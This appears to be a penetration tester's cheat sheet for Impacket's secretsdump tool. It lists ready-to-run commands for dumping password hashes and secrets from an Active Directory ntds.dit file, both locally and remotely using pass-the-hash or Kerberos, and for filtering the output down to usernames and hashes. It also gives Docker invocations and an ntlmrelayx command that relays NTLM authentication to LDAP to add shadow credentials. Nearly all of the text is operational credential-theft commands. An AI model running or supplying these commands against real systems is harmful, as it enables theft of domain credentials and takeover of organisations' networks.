secretsdump
Dump secrets out of a ntds.dit file locally
./secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL -outputfile MYOUTPUTFILE
Note: don't put .ntds extension on the end of MYOUTPUTFILE.
Dump secrets out of a ntds.dit file locally (with history included)
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile customername-dump -history
Note: don't put .ntds extension on the end of MYOUTPUTFILE.
Parsing a domain's secretsdump outputfile to extract a file with just usernames and hashes while ignoring machines
cat 7MS-DC01_192.168.77.7_2022-12-27_164828.ntds | cut -d ':' -f 1,4 | grep -v '\$' | sed 's/domain.com\\//' | sort
Dump secrets using a local admin account
secretsdump.py localhost/administrator@host -hashes x:y
Dump secrets using Kerberos
secretsdump.py -k -no-pass VICTIM -debug
Run secretsdump against a text file full of machines
Check out this script.
Run secretsdump in docker
docker run -it --rm "impacket:latest"
Run with exposed ports
sudo docker run -it --rm -p 80:80 -p 445:445 -p 443:443 "impacket:latest"
/opt/venv/bin # ./ntlmrelayx.py -t ldap://1.2.3.4 --shadow-credentials